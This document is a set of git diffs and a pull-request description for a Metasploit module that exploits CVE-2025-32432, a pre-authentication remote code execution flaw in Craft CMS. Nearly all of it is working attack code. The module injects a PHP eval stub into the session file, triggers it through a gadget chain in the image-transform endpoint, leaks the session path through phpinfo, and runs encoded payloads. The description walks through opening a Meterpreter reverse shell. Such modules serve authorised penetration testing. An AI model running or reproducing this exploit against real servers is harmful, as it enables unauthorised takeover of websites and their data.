-    generator = Rex::RandomIdentifier::Generator.new
-    disabled_var = "$#{generator[:dis]}"
-    payload_b64 = Rex::Text.encode_base64(encoded_payload)
-
-    <<~PHP
-      #{php_preamble(disabled_varname: disabled_var)}
-      $c=base64_decode("#{payload_b64}");
-      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
-    PHP
-  end
-
-  def exploit
-    payload_code = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
-    encoded_payload = framework.encoders
-                               .create('php/base64')
-                               .encode(payload_code)
-
-    random_param = Rex::Text.rand_text_alphanumeric(5..12)
-    initial_payload = "<?php eval($_GET['#{random_param}']);die();"
-
-    print_status 'Making initial request to push payload and get a CSRF token'
-    session_id, csrf_token = fetch_cookies_and_csrf(initial_payload)
-    unless csrf_token
-      fail_with(Failure::Unknown, 'Could not retrieve session ID and CSRF token')
-    end
-
-    vprint_status "Session ID: #{session_id}"
-    vprint_status "CSRF token: #{csrf_token}"
-
-    print_status 'Triggering code via assets/generate-transform'
-    request_payload = {
+    body = {
       assetId: datastore['ASSET_ID'],
       handle: {
         width: Rex::Text.rand_text_numeric(1..5),
         height: Rex::Text.rand_text_numeric(1..5),
-        'as hack' => {
+        "as #{Rex::Text.rand_text_alphanumeric(1..8)}" => {
           class: 'craft\\behaviors\\FieldLayoutBehavior',
           __class: 'yii\\rbac\\PhpManager',
           '__construct()' => [
-            { itemFile: "/var/lib/php/sessions/sess_#{session_id}" }
+            { itemFile: session_file }
           ]
         }
       }
     }.to_json
 
-    send_request_cgi!(
+    send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get' => { 'p' => 'actions/assets/generate-transform', random_param => encoded_payload },
-      'headers' => { 'X-CSRF-Token' => csrf_token },
+      'vars_get' => {
+        'p' => 'actions/assets/generate-transform',
+        param_name => payload
+      },
+      'headers' => { 'X-CSRF-Token' => csrf },
       'ctype' => 'application/json',
-      'data' => request_payload,
+      'data' => body,
       'keep_cookies' => true
     )
   end
 
-  def extract_csrf_token(res)
-    get_token = lambda do |r|
-      next unless r&.code == 200
+  def fetch_cookies_and_csrf
+    param_name = Rex::Text.rand_text_alphanumeric(5..12)
+    static_stub = "<?=eval($_GET['#{param_name}']);die()?>"
 
-      r.get_html_document.at("//input[@name='CRAFT_CSRF_TOKEN']/@value")&.text
-    end
-
-    token = get_token.call(res)
-
-    if token.nil? || token.empty?
-      vprint_status 'CSRF not found, falling back to root'
-      fb_res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'index.php'),
-        'keep_cookies' => true
-      )
-      token = get_token.call(fb_res)
-    end
-
-    token unless token.nil? || token.empty?
-  end
-
-  def fetch_cookies_and_csrf(payload_param = nil)
-    rand_param = Rex::Text.rand_text_alphanumeric(5..12)
-    params = { 'p' => 'admin/dashboard', rand_param => payload_param }.compact
+    params = {
+      'p' => 'admin/dashboard',
+      param_name => static_stub
+    }
 
     cookie_jar.clear
     res = send_request_cgi(
@@ -178,9 +122,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     return nil unless res
 
-    raw_cookies = res.get_cookies.to_s
-    session_id = raw_cookies.scan(/CraftSessionId=([^;]+)/).flatten.first
-    return nil if session_id.nil? || session_id.empty?
+    session_id = res.get_cookies[/CraftSessionId=([^;]+)/, 1]
+    return nil if session_id.to_s.empty?
 
     if res.code == 302 && res.headers['Location']
       res = send_request_cgi(
@@ -190,10 +133,41 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     end
 
-    token = extract_csrf_token(res)
-    return nil unless token
+    csrf = extract_csrf_token(res)
+    return nil unless csrf
 
-    payload_param ? [session_id, token] : token
+    [session_id, csrf, param_name]
+  end
+
+  def extract_csrf_token(res)
+    doc = res.get_html_document
+    token = doc.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+    return token unless token.to_s.empty?
+
+    vprint_status('CSRF not found in dashboard, falling back to root')
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true
+    )
+    res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+  end
+
+  def leak_session_path(csrf)
+    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
+    return nil unless res&.body
+
+    doc = res.get_html_document
+
+    path = doc.at_xpath(
+      "//tr[td[@class='e' and normalize-space(text())='session.save_path']]/td[@class='v']"
+    )&.text
+
+    path ||= doc.at_xpath(
+      "//h2[normalize-space(text())='Session Save Path']/following-sibling::p[1]"
+    )&.text
+
+    path&.strip
   end
 
   def send_transform(csrf, asset_id, php_string)
@@ -202,12 +176,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'handle' => {
         'width' => Rex::Text.rand_text_numeric(1..5),
         'height' => Rex::Text.rand_text_numeric(1..5),
-        'as session' => {
+        "as #{Rex::Text.rand_text_alphanumeric(1..8)}" => {
           'class' => 'craft\\behaviors\\FieldLayoutBehavior',
           '__class' => 'GuzzleHttp\\Psr7\\FnStream',
-          '__construct()' => [
-            []
-          ],
+          '__construct()' => [[]],
           '_fn_close' => php_string
         }
       }
@@ -221,5 +193,55 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'X-CSRF-Token' => csrf },
       'data' => json_data
     )
+  end
+
+  def check
+    _, csrf, = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve session & CSRF') unless csrf
+
+    if (path = leak_session_path(csrf))
+      @session_path = path
+      print_good("Leaked session.save_path: #{@session_path}")
+      return CheckCode::Vulnerable('Session path leaked')
+    end
+
+    a = Rex::Text.rand_text_numeric(4).to_i
+    b = Rex::Text.rand_text_numeric(4).to_i
+
+    expr = "#{a}+#{b}"
+    sum = a + b
+    print_status("Checking RCE: #{expr}")
+
+    payload = "print_r(#{expr});"
+    res = execute_via_session(payload)
+    return CheckCode::Unknown('No response') unless res
+
+    if res.body.include?(sum.to_s)
+      CheckCode::Vulnerable("Detected RCE: #{sum}")
+    else
+      CheckCode::Safe("Sum #{sum} not found")
+    end
+  end
+
+  def exploit
+    raw = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64 = Rex::Text.encode_base64(raw)
+
+    payload_code = "eval(base64_decode('#{b64}'));"
+
+    print_status('Injecting stub & triggering payload...')
+    execute_via_session(payload_code)
+  end
+
+  def php_exec_cmd(encoded_payload)
+    gen = Rex::RandomIdentifier::Generator.new
+    disabled_var = "$#{gen[:dis]}"
+    b64 = Rex::Text.encode_base64(encoded_payload)
+
+    <<~PHP
+      #{php_preamble(disabled_varname: disabled_var)}
+      $c=base64_decode("#{b64}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
+    PHP
   end
 end

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('No response') unless res
 
     if res.body.include?(sum.to_s)
-      CheckCode::Vulnerable("Detected RCE: #{sum}")
+      CheckCode::Vulnerable("Detected RCE: send #{a}+#{b}, got #{sum}!")
     else
       CheckCode::Safe("Sum #{sum} not found")
     end

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'keep_cookies' => true
     )
-    res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+    res2&.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
   end
 
   def leak_session_path(csrf)

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -219,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body.include?(sum.to_s)
       CheckCode::Vulnerable("Detected RCE: send #{a}+#{b}, got #{sum}!")
     else
-      CheckCode::Safe("Sum #{sum} not found")
+      CheckCode::Safe("Unable to exercise code execution.")
     end
   end
 

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Craft CMS Preauth RCE Meterpreter (CVE-2025-32432)',
+        'Name' => 'Craft CMS Image Transform Preauth RCE (CVE-2025-32432)',
         'Description' => %q{
           This module exploits an unauthenticated remote code execution vulnerability
           in Craft CMS versions 3.x, 4.x, and 5.x < 5.6.17 via the image transform endpoint.
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
-        OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(rand(2..3))])
+        OptInt.new('ASSET_ID', [true, 'Existing asset ID', Rex::Text.rand_text_numeric(2..3)])
       ]
     )
   end
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
     phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     final_payload = framework.encoders.create('php/base64').encode(phped_payload)
 
-    random_param_name = Rex::Text.rand_text_alphanumeric(rand(5..12))
+    random_param_name = Rex::Text.rand_text_alphanumeric(5..12)
 
     first_payload = "<?=eval(\$_GET[\"#{random_param_name}\"]);die()?>"
 
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
     json_data = {
       'assetId' => datastore['ASSET_ID'],
       'handle' => {
-        'width' => rand(100..500),
-        'height' => rand(100..500),
+        'width' => Rex::Text.rand_text_alphanumeric(100..500),
+        'height' => Rex::Text.rand_text_alphanumeric(100..500),
         'as hack' => {
           'class' => 'craft\\behaviors\\FieldLayoutBehavior',
           '__class' => 'yii\\rbac\\PhpManager',
@@ -144,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def fetch_cookies_and_csrf(payload_param = nil)
     vars_get = { 'p' => 'admin/dashboard' }
-    vars_get['a'] = payload_param if payload_param
+    random_param_name = Rex::Text.rand_text_alphanumeric(5..12)
+    vars_get[random_param_name] = payload_param if payload_param
 
     query_string = vars_get.map { |key, value| "#{key}=#{value}" }.join('&')
 
@@ -178,8 +179,8 @@ class MetasploitModule < Msf::Exploit::Remote
     json_data = {
       'assetId' => asset_id,
       'handle' => {
-        'width' => rand(100..500),
-        'height' => rand(100..500),
+        'width' => Rex::Text.rand_text_alphanumeric(100..500),
+        'height' => Rex::Text.rand_text_alphanumeric(100..500),
         'as session' => {
           'class' => 'craft\\behaviors\\FieldLayoutBehavior',
           '__class' => 'GuzzleHttp\\Psr7\\FnStream',

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
                                .encode(payload_code)
 
     random_param = Rex::Text.rand_text_alphanumeric(5..12)
-    initial_payload = "<?=eval($_GET['#{random_param}']);die()?>"
+    initial_payload = "<?php eval($_GET['#{random_param}']);die();"
 
     print_status 'Making initial request to push payload and get a CSRF token'
     session_id, csrf_token = fetch_cookies_and_csrf(initial_payload)

--- a/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
+++ b/modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
     json_data = {
       'assetId' => datastore['ASSET_ID'],
       'handle' => {
-        'width' => Rex::Text.rand_text_alphanumeric(100..500),
-        'height' => Rex::Text.rand_text_alphanumeric(100..500),
+        'width' => Rex::Text.rand_text_numeric(1..5),
+        'height' => Rex::Text.rand_text_numeric(1..5),
         'as hack' => {
           'class' => 'craft\\behaviors\\FieldLayoutBehavior',
           '__class' => 'yii\\rbac\\PhpManager',
@@ -181,8 +181,8 @@ class MetasploitModule < Msf::Exploit::Remote
     json_data = {
       'assetId' => asset_id,
       'handle' => {
-        'width' => Rex::Text.rand_text_alphanumeric(100..500),
-        'height' => Rex::Text.rand_text_alphanumeric(100..500),
+        'width' => Rex::Text.rand_text_numeric(1..5),
+        'height' => Rex::Text.rand_text_numeric(1..5),
         'as session' => {
           'class' => 'craft\\behaviors\\FieldLayoutBehavior',
           '__class' => 'GuzzleHttp\\Psr7\\FnStream',


### PR DESCRIPTION
**Hey Metasploit team,**

It's been a while since my last submission! Always a pleasure to contribute. I'm submitting a new exploit for **CVE-2025-32432** targeting **Craft CMS**.

This exploit takes advantage of an unauthenticated RCE vulnerability in **Craft CMS versions 3.x, 4.x, and 5.x < 5.6.17**. The attack is possible via the image transform endpoint, which allows the injection of a PHP Meterpreter payload into the Craft session. The payload is then triggered through the `generate-transform` endpoint using the Yii behavior gadget chain.

---

### Verification

**Steps to verify this module:**

- [x] Start `msfconsole`
- [x] Use the module: `use exploit/linux/http/craftcms_preauth_rce_cve_2025_32432`
- [x] Set the target Craft CMS instance in `RHOSTS`
- [x] Set necessary options (`ASSET_ID` for older 3.x versions)
- [x] Set the payload (`cmd/linux/http/x64/meterpreter/reverse_tcp`)
- [x] Set `LHOST` and `LPORT`
- [x] Run the exploit using `run`
- [x] **Verify** that the exploit successfully opens a Meterpreter session
- [x] **Verify** that no unintended side effects occur

**Additional Information:**

- **ASSET_ID** must be correctly configured for older versions of **Craft CMS (3.x)**.
- For **Craft CMS 5.x and 4.x**, this isn't necessary, but ensure you follow the version specifications.

---

Looking forward to your feedback! Always excited to contribute to the Metasploit community.